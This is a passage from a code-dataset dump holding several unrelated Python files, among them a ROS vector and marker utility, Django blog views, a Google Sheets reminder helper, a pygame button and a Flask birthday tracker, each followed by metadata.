\"\"\"\n\n def __init__(self, x=0, y=0):\n \"\"\"\n Initialize vector components.\n\n Args:\n x (float): x component of the vector\n y (float): y component of the vector\n \"\"\"\n self.x = x\n self.y = y\n\n @classmethod\n def from_norm_arg(cls, norm=0, arg=0):\n inst = cls(1, 1)\n inst.set_mag(norm)\n inst.set_angle(arg)\n return inst\n\n def __add__(self, other):\n if isinstance(other, self.__class__):\n return Vector2(self.x + other.x, self.y + other.y)\n elif isinstance(other, int) or isinstance(other, float):\n return Vector2(self.x + other, self.y + other)\n\n def __sub__(self, other):\n if isinstance(other, self.__class__):\n return Vector2(self.x - other.x, self.y - other.y)\n elif isinstance(other, int) or isinstance(other, float):\n return Vector2(self.x - other, self.y - other)\n\n def __div__(self, other):\n if isinstance(other, self.__class__):\n raise ValueError(\"Cannot divide two vectors!\")\n elif isinstance(other, int) or isinstance(other, float):\n if other != 0:\n return Vector2(self.x / other, self.y / other)\n else:\n return Vector2()\n\n def __mul__(self, other):\n if isinstance(other, self.__class__):\n raise NotImplementedError(\"Multiplying vectors is not implemented!\")\n elif isinstance(other, int) or isinstance(other, float):\n return Vector2(self.x * other, self.y * other)\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n def __str__(self):\n return \"({: .5f}, {: 6.1f})\".format(self.norm(), self.arg())\n # return \"({: .3f}, {: .3f})\".format(self.x, self.y)\n\n def __repr__(self):\n return \"Vector2({0}, {1})\\n\\t.norm = {2}\\n\\t.arg = {3}\".format(self.x, self.y, self.norm(), self.arg())\n\n def norm(self):\n \"\"\"Return the norm of the vector.\"\"\"\n return math.sqrt(pow(self.x, 2) + pow(self.y, 2))\n\n def arg(self):\n \"\"\"Return the angle of the vector.\"\"\"\n return math.degrees(math.atan2(self.y, self.x))\n\n def set_mag(self, value):\n \"\"\"Set vector's magnitude without changing direction.\"\"\"\n if self.norm() == 0:\n logging.warning('Trying to set magnitude for a null-vector! 
Angle will be set to 0!')\n self.x = 1\n self.y = 0\n else:\n self.normalize()\n self.x *= value\n self.y *= value\n\n def set_angle(self, value):\n \"\"\"Set vector's direction without changing magnitude.\"\"\"\n if self.norm() == 0:\n logging.warning('Trying to set angle for a null-vector! Magnitude will be set to 1!')\n self.x = 1\n self.y = 0\n delta = angle_diff(self.arg(), value)\n self.rotate(delta)\n\n def rotate(self, value):\n \"\"\"Rotate vector by degrees specified in value.\"\"\"\n value = math.radians(value)\n self.x, self.y = math.cos(value) * self.x - math.sin(value) * self.y, \\\n math.sin(value) * self.x + math.cos(value) * self.y\n\n def normalize(self, ret=False):\n \"\"\"Normalize the vector.\"\"\"\n d = self.norm()\n if d:\n if not ret:\n self.x /= d\n self.y /= d\n else:\n return Vector2(self.x / d, self.y / d)\n\n def limit(self, value):\n \"\"\"Limit vector's maximum magnitude to given value.\"\"\"\n if self.norm() > value:\n self.set_mag(value)\n\n def limit_lower(self, value):\n \"\"\"Limit vector's minimum magnitude to given value.\"\"\"\n if self.norm() < value:\n self.set_mag(value)\n\n def constrain(self, old_value, max_value):\n \"\"\"Limit vector's change of direction to max_value from old_value.\"\"\"\n desired_value = self.arg()\n delta = angle_diff(old_value, desired_value)\n if abs(delta) > max_value:\n value = angle_diff(desired_value, old_value + math.copysign(max_value, delta))\n self.rotate(value)\n\n\ndef angle_diff(from_angle, to_angle):\n diff = (to_angle - from_angle) % 360\n if diff >= 180:\n diff -= 360\n return diff\n\n\ndef pose_dist(pose1, pose2):\n \"\"\"Return Euclidean distance between two ROS poses.\"\"\"\n x1 = pose1.position.x\n y1 = pose1.position.y\n x2 = pose2.position.x\n y2 = pose2.position.y\n\n return math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2))\n\n\nclass MarkerSet(object):\n \"\"\"\n Convenience class for handling Rviz markers.\n\n Markers are used to visualize each of the Reynolds' rules component in Rviz.\n Markers are set to arrows to represent force and velocity vectors.\n \"\"\"\n def __init__(self):\n \"\"\"Initialize class and set common marker properties.\"\"\"\n self.visualization = MarkerArray()\n\n # Make sure these keys are the same as the ones in `boids.py`\n keys = ['alignment', 'cohesion', 'separation', 'avoid', 'acceleration', 'velocity', 'estimated']\n self.markers = dict.fromkeys(keys)\n\n marker_id = 0\n for key in keys:\n self.markers[key] = Marker()\n self.markers[key].header.frame_id = rospy.get_namespace() + 'base_link'\n self.markers[key].header.stamp = rospy.get_rostime()\n self.markers[key].ns = rospy.get_namespace().split('/')[1]\n self.markers[key].id = marker_id\n self.markers[key].type = Marker.ARROW\n self.markers[key].action = Marker.ADD\n self.markers[key].pose = Pose()\n self.markers[key].pose.position.z = 0.036 # Sphero radius\n self.markers[key].lifetime = rospy.Duration(0)\n self.markers[key].frame_locked = True\n marker_id += 1\n\n # Set colors of each marker\n self.markers['alignment'].color = ColorRGBA(0, 0, 1, 1) # blue\n self.markers['cohesion'].color = ColorRGBA(0, 1, 0, 1) # green\n self.markers['separation'].color = ColorRGBA(1, 0, 0, 1) # red\n self.markers['avoid'].color = ColorRGBA(1, 1, 0, 1) # yellow\n self.markers['acceleration'].color = ColorRGBA(0, 0, 0, 1) # black\n self.markers['velocity'].color = ColorRGBA(1, 1, 1, 1) # white\n self.markers['estimated'].color = ColorRGBA(1, 0.55, 0, 1) # orange\n\n def update_data(self, values):\n \"\"\"\n Set scale and direction of 
markers.\n\n Args:\n values (dict): Holds norm and arg data for each component\n \"\"\"\n if values is not None:\n for key in self.markers.keys():\n data = values[key]\n angle = Quaternion(*quaternion_from_euler(0, 0, math.radians(data.arg())))\n scale = Vector3(data.norm(), 0.02, 0.02)\n\n self.markers[key].header.stamp = rospy.get_rostime()\n self.markers[key].pose.orientation = angle\n self.markers[key].scale = scale\n\n self.visualization.markers = self.markers.values()\n return self.visualization\n\n\nclass MAFilter(object):\n # TODO: remove if not necessary\n \"\"\"Implementation of a moving average filter with variable window length.\"\"\"\n def __init__(self, win_length):\n \"\"\"\n Initialize empty window for averaging.\n\n Args:\n win_length: length of a window\n \"\"\"\n # Window is initialized with NaNs so that the average would be correct\n # during the first few steps while the window is not yet full\n self.window = np.array([np.nan] * win_length)\n\n def step(self, value):\n \"\"\"\n Add new value at the end of the window, shift older values to the left\n and return the average.\n \"\"\"\n self.window[:-1] = self.window[1:]\n self.window[-1] = value\n # np.nanmean returns mean value while ignoring NaNs\n return np.nanmean(self.window)\n", "repo_name": "mkrizmancic/sphero_formation", "sub_path": "src/sphero_formation/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 9230, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.sqrt", "line_number": 102, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 106, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 106, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 111, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 122, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 130, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 131, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 131, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 132, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 132, "usage_type": "call"}, {"api_name": "math.copysign", "line_number": 159, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 177, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.MarkerArray", "line_number": 189, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 197, "usage_type": "call"}, {"api_name": "rospy.get_namespace", "line_number": 198, "usage_type": "call"}, {"api_name": "rospy.get_rostime", "line_number": 199, "usage_type": "call"}, {"api_name": "rospy.get_namespace", "line_number": 200, "usage_type": "call"}, {"api_name": "visualization_msgs.msg.Marker.ARROW", "line_number": 202, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 202, "usage_type": "name"}, {"api_name": "visualization_msgs.msg.Marker.ADD", "line_number": 203, "usage_type": "attribute"}, {"api_name": "visualization_msgs.msg.Marker", "line_number": 203, "usage_type": "name"}, {"api_name": "geometry_msgs.msg.Pose", "line_number": 204, "usage_type": "call"}, {"api_name": "rospy.Duration", "line_number": 206, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 211, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 212, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", 
"line_number": 213, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 214, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 215, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 216, "usage_type": "call"}, {"api_name": "std_msgs.msg.ColorRGBA", "line_number": 217, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Quaternion", "line_number": 229, "usage_type": "call"}, {"api_name": "tf.transformations.quaternion_from_euler", "line_number": 229, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 229, "usage_type": "call"}, {"api_name": "geometry_msgs.msg.Vector3", "line_number": 230, "usage_type": "call"}, {"api_name": "rospy.get_rostime", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 262, "usage_type": "call"}]} +{"seq_id": "12854537422", "text": "from django.shortcuts import render, get_object_or_404\nfrom django.contrib.postgres.search import SearchVector, SearchQuery, SearchRank, TrigramSimilarity\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import ListView\nfrom .models import Post\nfrom .forms import EmailPostForm, ComentarioForm, BuscarForm\nfrom django.core.mail import send_mail\nfrom taggit.models import Tag\nfrom django.db.models import Count\n\n\nclass PostListView(ListView):\n queryset = Post.publicados.all()\n context_object_name = 'posts'\n paginate_by = 2\n template_name = 'blog/post/post_list.html'\n\n\ndef posts_list(request, tag_slug=None):\n object_list = Post.publicados.all()\n tag = None\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n paginator = Paginator(object_list, 2)\n page = request.GET.get('page')\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n return render(request, 'blog/post/list.html', {'page': page, 'posts': posts, 'tag': tag})\n\n\ndef post_detail(request, year, month, day, post):\n post = get_object_or_404(Post,\n slug=post,\n estatus='publicado',\n publicado__year=year,\n publicado__month=month,\n publicado__day=day)\n comentarios = post.comentarios.filter(activo=True)\n comentario_nuevo = None\n if request.method == 'POST':\n comentario_form = ComentarioForm(data=request.POST)\n if comentario_form.is_valid():\n comentario_nuevo = comentario_form.save(commit=False)\n comentario_nuevo.post = post\n comentario_nuevo.save()\n else:\n comentario_form = ComentarioForm()\n post_tags_ids = post.tags.values_list('id', flat=True)\n similar_posts = Post.publicados.filter(tags__in=post_tags_ids).exclude(id=post.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags')).order_by('-same_tags', '-publicado')[:4]\n return render(request, 'blog/post/detail.html',\n {'post': post,\n 'comentarios': comentarios,\n 'comentario_nuevo': comentario_nuevo,\n 'comentario_form': comentario_form,\n 'posts_similares': similar_posts,\n })\n\n\ndef post_share(request, post_id):\n post = get_object_or_404(Post, id=post_id, estatus='publicado')\n sent = False\n\n if request.method == 'POST':\n form = EmailPostForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n # ... 
send email\n            post_url = request.build_absolute_uri(post.get_absolute_url())\n            subject = f'{cd[\"nombre\"]} ({cd[\"email\"]}) te recomienda leer \"{post.titulo}\"'\n            message = f'Leer \"{post.titulo}\" en {post_url}\\n\\nComentarios de {cd[\"nombre\"]}:\\n{cd[\"comentarios\"]}'\n            send_mail(subject, message, 'admin@myblog.com', [cd['para']])\n            sent = True\n    else:\n        form = EmailPostForm()\n    return render(request, 'blog/post/share.html', {'post': post, 'form': form, 'sent': sent})\n\n\ndef post_search(request):\n    form = BuscarForm()\n    query = None\n    results = []\n    if 'palabras' in request.GET:\n        form = BuscarForm(request.GET)\n        if form.is_valid():\n            query = form.cleaned_data['palabras']\n            search_vector = SearchVector('titulo', weight='A') + SearchVector('contenido', weight='B')\n            search_query = SearchQuery(query)\n            results = Post.objectos.annotate(\n                # search=search_vector,\n                # rank=SearchRank(search_vector, search_query)\n                # ).filter(rank__gte=0.3).order_by('-rank')\n                similarity=TrigramSimilarity('titulo', query)\n            ).filter(similarity__gte=0.3).order_by('-similarity')\n    return render(request,\n                  'blog/post/search.html',\n                  {'form': form,\n                   'query': query,\n                   'results': results})\n", "repo_name": "Roderich25/mac", "sub_path": "django-by-example/blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4225, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.generic.ListView", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Post.publicados.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Post.publicados", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Post.publicados.all", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Post.publicados", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 23, "usage_type": "call"}, {"api_name": "taggit.models.Tag", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.core.paginator.Paginator", "line_number": 25, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 37, "usage_type": "argument"}, {"api_name": "forms.ComentarioForm", "line_number": 46, "usage_type": "call"}, {"api_name": "forms.ComentarioForm", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Post.publicados.filter", "line_number": 54, "usage_type": "call"}, {"api_name": "models.Post.publicados", "line_number": 54, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 54, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 66, "usage_type": "argument"}, {"api_name": "forms.EmailPostForm", "line_number": 70, "usage_type": "call"}, {"api_name": 
"django.core.mail.send_mail", "line_number": 77, "usage_type": "call"}, {"api_name": "forms.EmailPostForm", "line_number": 80, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.BuscarForm", "line_number": 85, "usage_type": "call"}, {"api_name": "forms.BuscarForm", "line_number": 89, "usage_type": "call"}, {"api_name": "django.contrib.postgres.search.SearchVector", "line_number": 92, "usage_type": "call"}, {"api_name": "django.contrib.postgres.search.SearchQuery", "line_number": 93, "usage_type": "call"}, {"api_name": "models.Post.objectos.annotate", "line_number": 94, "usage_type": "call"}, {"api_name": "models.Post.objectos", "line_number": 94, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 94, "usage_type": "name"}, {"api_name": "django.contrib.postgres.search.TrigramSimilarity", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "27182219945", "text": "import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\ns=['https://www.googleapis.com/auth/spreadsheets',\n'https://www.googleapis.com/auth/drive']\n\ncreds= ServiceAccountCredentials.from_json_keyfile_name(\"credentials.json\",s)\nclient=gspread.authorize(creds)\n\nsheet = client.open(\"Reminders\").sheet1\nrow_values=sheet.row_values(1)\ncol_values=sheet.col_values(1)\nrow_filled=len(col_values)\ncol_filled=len(row_values)\n\n \ndef save_reminder_date(date):\n\n sheet.update_cell(row_filled+1, 1, date)\n print(\"saved date!\")\n return 0\n \ndef save_reminder_body(msg):\n\n sheet.update_cell(row_filled+1, 2, msg)\n print(\"saved reminder message!\")\n return 0\n\n\n", "repo_name": "poojitagarg/whatsapp-chatbot", "sub_path": "whatsapp-bot/gsheet_func.py", "file_name": "gsheet_func.py", "file_ext": "py", "file_size_in_byte": 694, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name", "line_number": 7, "usage_type": "call"}, {"api_name": "oauth2client.service_account.ServiceAccountCredentials", "line_number": 7, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "36354138184", "text": "import sqlite3\n\nfrom aiogram import types, Dispatcher\nfrom aiogram.utils.deep_linking import _create_link\n\nfrom config import bot\nfrom database.sql_commands import Database\nfrom keyboards.inline_buttoons import start_keyboard\n\n\nasync def start_button(message: types.Message):\n print(message)\n print(message.get_full_command())\n command = message.get_full_command()\n if command[1] != \"\":\n link = await _create_link(link_type=\"start\", payload=command[1])\n owner = Database().sql_select_user_by_link_query(\n link=link\n )\n if owner[0][\"telegram_id\"] == message.from_user.id:\n await bot.send_message(\n chat_id=message.from_user.id,\n text=\"You can not use own referral link\"\n )\n return\n print(f\"owner: {owner}\")\n try:\n Database().sql_insert_referral_query(\n owner=owner[0]['telegram_id'],\n referral=message.from_user.id\n )\n except sqlite3.IntegrityError:\n pass\n\n try:\n Database().sql_insert_user_query(\n telegram_id=message.from_user.id,\n username=message.from_user.username,\n first_name=message.from_user.first_name,\n last_name=message.from_user.last_name,\n )\n except sqlite3.IntegrityError:\n pass\n\n 
await bot.send_message(\n chat_id=message.chat.id,\n text=\"Hello, my dear!\",\n reply_markup=await start_keyboard()\n )\n\n\ndef register_start_handlers(dp: Dispatcher):\n dp.register_message_handler(start_button, commands=['start'])", "repo_name": "Ebulda/new_one", "sub_path": "handlers/start.py", "file_name": "start.py", "file_ext": "py", "file_size_in_byte": 1618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "aiogram.types.Message", "line_number": 11, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 11, "usage_type": "name"}, {"api_name": "aiogram.utils.deep_linking._create_link", "line_number": 16, "usage_type": "call"}, {"api_name": "database.sql_commands.Database", "line_number": 17, "usage_type": "call"}, {"api_name": "config.bot.send_message", "line_number": 21, "usage_type": "call"}, {"api_name": "config.bot", "line_number": 21, "usage_type": "name"}, {"api_name": "database.sql_commands.Database", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlite3.IntegrityError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "database.sql_commands.Database", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlite3.IntegrityError", "line_number": 42, "usage_type": "attribute"}, {"api_name": "config.bot.send_message", "line_number": 45, "usage_type": "call"}, {"api_name": "config.bot", "line_number": 45, "usage_type": "name"}, {"api_name": "keyboards.inline_buttoons.start_keyboard", "line_number": 48, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "14558735810", "text": "import hashlib\nfrom typing import Optional\n\nimport r128gain\n\n\ndef get_gain_level(filepath) -> Optional[float]:\n \"\"\"\n Takes a path to a file and calculates the gain level for the file using some external library.\n :param filepath: The file to get the gain level for\n :return: Either the gain level for the file or None, if it couldn't be determined\n \"\"\"\n try:\n gain_info = r128gain.get_r128_loudness([filepath])\n if isinstance(gain_info[0], float):\n return gain_info[0]\n else:\n return None\n except:\n return None\n\n\ndef get_sha1_hash(filepath) -> Optional[str]:\n \"\"\"\n Reads a file and returns its SHA1 hash as a hex string\n :param filepath: The file to hash\n :return: The hash as a hex string or None if some error occured\n \"\"\"\n block_size = 2 ** 18 # 256kB\n sha1 = hashlib.sha1()\n\n try:\n with open(filepath, 'rb') as file_handle:\n while True:\n data = file_handle.read(block_size)\n if not data:\n break\n sha1.update(data)\n return sha1.hexdigest()\n except:\n return None\n", "repo_name": "drdummsprech/sip-puff-jukebox", "sub_path": "scanner/Scan.py", "file_name": "Scan.py", "file_ext": "py", "file_size_in_byte": 1160, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "r128gain.get_r128_loudness", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 7, "usage_type": "name"}, {"api_name": "hashlib.sha1", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "15108127965", "text": "import pathlib\nimport zlib\nimport pickle\nimport pickletools\nimport base64\nimport sys\nimport contextlib\n\nsave_file = './library.bin'\n\nclass Resource:\n\n \"\"\"Manager for resources that would normally be held 
externally.\"\"\"\n\n WIDTH = 76\n __CACHE = None\n DATA = b''''''\n\n @classmethod\n def package(cls, *paths):\n \"\"\"Creates a resource string to be copied into the class.\"\"\"\n cls.__generate_data(paths, {})\n\n @classmethod\n def add(cls, *paths):\n \"\"\"Include paths in the pre-generated DATA block up above.\"\"\"\n cls.__preload()\n cls.__generate_data(paths, cls.__CACHE.copy())\n\n @classmethod\n def __generate_data(cls, paths, buffer):\n \"\"\"Load paths into buffer and output DATA code for the class.\"\"\"\n for path in map(pathlib.Path, paths):\n if not path.is_file():\n raise ValueError('{!r} is not a file'.format(path))\n key = path.name\n if key in buffer:\n raise KeyError('{!r} has already been included'.format(key))\n with path.open('rb') as file:\n buffer[key] = file.read()\n pickled = pickle.dumps(buffer, pickle.HIGHEST_PROTOCOL)\n optimized = pickletools.optimize(pickled)\n compressed = zlib.compress(optimized, zlib.Z_BEST_COMPRESSION)\n encoded = base64.b85encode(compressed)\n cls.__print(\" DATA = b'''\")\n for offset in range(0, len(encoded), cls.WIDTH):\n cls.__print(\"\\\\\\n\" + encoded[\n slice(offset, offset + cls.WIDTH)].decode('ascii'))\n cls.__print(\"'''\")\n\n @staticmethod\n def __print(line):\n \"\"\"Provides alternative printing interface for simplicity.\"\"\"\n with open(save_file, 'a') as f:\n f.write(line)\n f.flush()\n sys.stdout.write(line)\n sys.stdout.flush()\n\n @classmethod\n @contextlib.contextmanager\n def load(cls, name, delete=True):\n \"\"\"Dynamically loads resources and makes them usable while needed.\"\"\"\n cls.__preload()\n if name not in cls.__CACHE:\n raise KeyError('{!r} cannot be found'.format(name))\n path = pathlib.Path(name)\n with path.open('wb') as file:\n file.write(cls.__CACHE[name])\n yield path\n if delete:\n path.unlink()\n\n @classmethod\n def __preload(cls):\n \"\"\"Warm up the cache if it does not exist in a ready state yet.\"\"\"\n if cls.__CACHE is None:\n decoded = base64.b85decode(cls.DATA)\n decompressed = zlib.decompress(decoded)\n cls.__CACHE = pickle.loads(decompressed)\n\n def __init__(self):\n \"\"\"Creates an error explaining class was used improperly.\"\"\"\n raise NotImplementedError('class was not designed for instantiation')\n\nif __name__ == '__main__':\n Resource.package('libcheckers.so')", "repo_name": "Veldrovive/checkers", "sub_path": "c_checkers/library_builder.py", "file_name": "library_builder.py", "file_ext": "py", "file_size_in_byte": 2860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pickle.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pickletools.optimize", "line_number": 42, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 43, "usage_type": "call"}, {"api_name": "zlib.Z_BEST_COMPRESSION", "line_number": 43, "usage_type": "attribute"}, {"api_name": "base64.b85encode", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 67, "usage_type": "call"}, {"api_name": 
"contextlib.contextmanager", "line_number": 61, "usage_type": "attribute"}, {"api_name": "base64.b85decode", "line_number": 78, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.loads", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "32755555721", "text": "import pygame as pg\nfrom src.settings import FONT, FONT_SIZE, COLOURS\n\nclass Button:\n def __init__(self, x, y, w, h, text=''):\n self.rect = pg.Rect(x, y, w, h)\n self.surf = pg.Surface((w, h))\n self.text = text\n\n def update_rect(self, new):\n x = new['x'] if 'x' in new else self.rect.left\n y = new['y'] if 'y' in new else self.rect.top\n w = new['w'] if 'w' in new else self.rect.width\n h = new['h'] if 'h' in new else self.rect.height\n self.rect = pg.Rect(x, y, w, h)\n self.surf = pg.Surface((w, h))\n\n def render(self, screen):\n FONT.render(self.surf, self.text, self.rect.width/2, self.rect.height/2, COLOURS['fc'], FONT_SIZE, style='center')\n screen.blit(self.surf, self.rect)\n \n def hover(self, c_idle, c_hover):\n if self.rect.collidepoint(pg.mouse.get_pos()):\n self.surf.fill(c_hover)\n else:\n self.surf.fill(c_idle)\n \n def click(self, cb, events):\n # check if button is clicked\n # call the cb function\n if self.rect.collidepoint(pg.mouse.get_pos()):\n for event in events:\n if event.type == pg.MOUSEBUTTONDOWN:\n cb()\n return True\n return False\n", "repo_name": "HuMangoPP/py_tasks", "sub_path": "src/components/button.py", "file_name": "button.py", "file_ext": "py", "file_size_in_byte": 1272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.Rect", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 16, "usage_type": "call"}, {"api_name": "src.settings.FONT.render", "line_number": 19, "usage_type": "call"}, {"api_name": "src.settings.FONT_SIZE", "line_number": 19, "usage_type": "argument"}, {"api_name": "src.settings.FONT", "line_number": 19, "usage_type": "name"}, {"api_name": "src.settings.COLOURS", "line_number": 19, "usage_type": "name"}, {"api_name": "pygame.mouse.get_pos", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "32174155260", "text": "from django.urls import path\nfrom .views import home,InboxView,ThreadView\n\napp_name = 'chat_app'\n\nurlpatterns = [\n path('',home,name='home'),\n path('thread//',ThreadView.as_view(),name='threads'),\n path('inbox/',InboxView.as_view(),name='inbox'),\n]\n", "repo_name": "NKrChauhan/chat-room", "sub_path": "chat_room/chatApp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 268, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.home", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.ThreadView.as_view", "line_number": 8, "usage_type": "call"}, 
{"api_name": "views.ThreadView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.InboxView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.InboxView", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "178388730", "text": "import os\r\n\r\nfrom cs50 import SQL\r\nfrom flask import Flask, flash, jsonify, redirect, render_template, request, session\r\n\r\n# Configure application\r\napp = Flask(__name__)\r\n\r\n# Ensure templates are auto-reloaded\r\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\r\n\r\n# Configure CS50 Library to use SQLite database\r\ndb = SQL(\"sqlite:///birthdays.db\")\r\n\r\nmonth_length = 12\r\nday_length = 31\r\n\r\n\r\n@app.after_request\r\ndef after_request(response):\r\n \"\"\"Ensure responses aren't cached\"\"\"\r\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\r\n response.headers[\"Expires\"] = 0\r\n response.headers[\"Pragma\"] = \"no-cache\"\r\n return response\r\n\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n\r\n if request.method == \"POST\":\r\n # TODO: Add the user's entry into the database\r\n # Saves user's input\r\n name = request.form.get(\"name\")\r\n month = request.form.get(\"month\")\r\n day = request.form.get(\"day\")\r\n\r\n try:\r\n month_int = int(month)\r\n day_int = int(day)\r\n except ValueError:\r\n return redirect(\"/\")\r\n\r\n # Checks for wrong forms\r\n if not name or month_int > month_length or not month or day_int > day_length or not day:\r\n return redirect(\"/\")\r\n\r\n # INSERTS user's input into database\r\n db.execute(\"INSERT INTO birthdays (name, month, day) VALUES ((?), (?) , (?))\", name, month, day)\r\n return redirect(\"/\")\r\n\r\n else:\r\n\r\n # TODO: Display the entries in the database on index.html\r\n # Saves the entries in the database on a variable\r\n birthdays = 